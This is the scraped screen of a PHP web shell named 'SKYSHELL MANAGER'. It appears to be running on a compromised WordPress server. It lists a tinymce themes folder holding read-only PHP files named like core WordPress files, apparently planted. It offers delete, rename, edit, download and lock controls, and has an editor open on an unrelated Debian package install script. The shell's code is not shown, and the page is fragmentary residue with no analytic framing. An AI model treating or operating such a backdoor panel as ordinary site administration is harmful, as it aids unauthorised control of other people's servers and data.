📁
SKYSHELL MANAGER
PHP v8.3.6
Create
Create
Path:
root
/
var
/
www
/
cstage
/
wp-includes
/
js
/
tinymce
/
themes
/
Name
Size
Perm
Actions
📁
inlite
-
0755
🗑️
🏷️
🔒
📁
modern
-
0755
🗑️
🏷️
🔒
📄
ms-files.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-activate.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: libtirpc3t64:amd64.preinst
#!/bin/sh set -e # per Helmut, these can't be safely removed again (in package postinst) # until forky case $1 in install) for file in libtirpc.so.3 libtirpc.so.3.0.0; do dpkg-divert --package libtirpc3t64 --no-rename \ --divert \ /lib/x86_64-linux-gnu/$file.usr-is-merged \ /lib/x86_64-linux-gnu/$file done ;; esac
Save